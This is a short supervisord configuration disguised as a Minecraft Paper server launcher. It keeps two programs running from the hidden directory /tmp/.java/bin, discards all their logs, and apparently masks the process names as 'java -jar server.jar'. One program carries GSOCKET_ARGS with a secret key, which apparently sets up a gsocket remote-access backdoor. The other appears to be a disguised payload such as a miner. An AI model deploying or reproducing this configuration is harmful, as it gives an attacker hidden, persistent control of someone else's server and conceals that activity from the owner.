[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./paper.jar -a 'java -Xms128M -Xmx3072M -jar server.jar' ./user-patch.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i0A3eD2E2K9c-4D9g8H6b5j7-56C4a9f6X1eCd9F9440-d6A28039A1c5J1g6K -liq"
command=./paper.jar -a 'java -Xms128M -Xmx3072M -jar server.jar' ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true